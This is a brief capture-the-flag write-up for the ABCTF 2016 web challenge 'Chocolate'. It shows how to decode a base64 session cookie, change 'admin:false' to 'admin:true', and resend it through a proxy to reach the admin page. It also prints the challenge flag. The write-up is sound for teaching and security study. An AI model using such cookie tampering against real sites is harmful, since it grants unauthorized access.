ABCTF - 50 - Chocolate - Web Exploitation

Saturday 23 July 2016 (2016-07-23)

Monday 1 April 2024 (2024-04-01)

noraj (Alexandre ZANNI)

ctf, security, web, writeups

🇬🇧

Information#

Version#

By	Version	Comment
noraj	1.0	Creation

CTF#

Name : ABCTF 2016
Website : http://abctf.xyz/
Type : Online
Format : Jeopardy - Student
CTF Time : link

Description#

If you could become admin you would get a flag. Link

Solution#

Launch Element Inspector of Firefox or the Firebug addon and use the network analyser.
See the request cookie e2FkbWluOmZhbHNlfQ==
Un-base64 it:

1 2	echo -n "e2FkbWluOmZhbHNlfQ==" \| base64 -d && echo "" {admin:false}

Edit the cookie and change the value to {admin:true} in base64

1 2	echo -n "{admin:true}" \| base64 e2FkbWluOnRydWV9

Send it again with a proxy tool like Burp, ZAP, Temper Data
And TADA! We get into the admin page: Wow! You're an admin, maybe. Well anyway, here is your flag, ABCTF{don't_trust_th3_coooki3}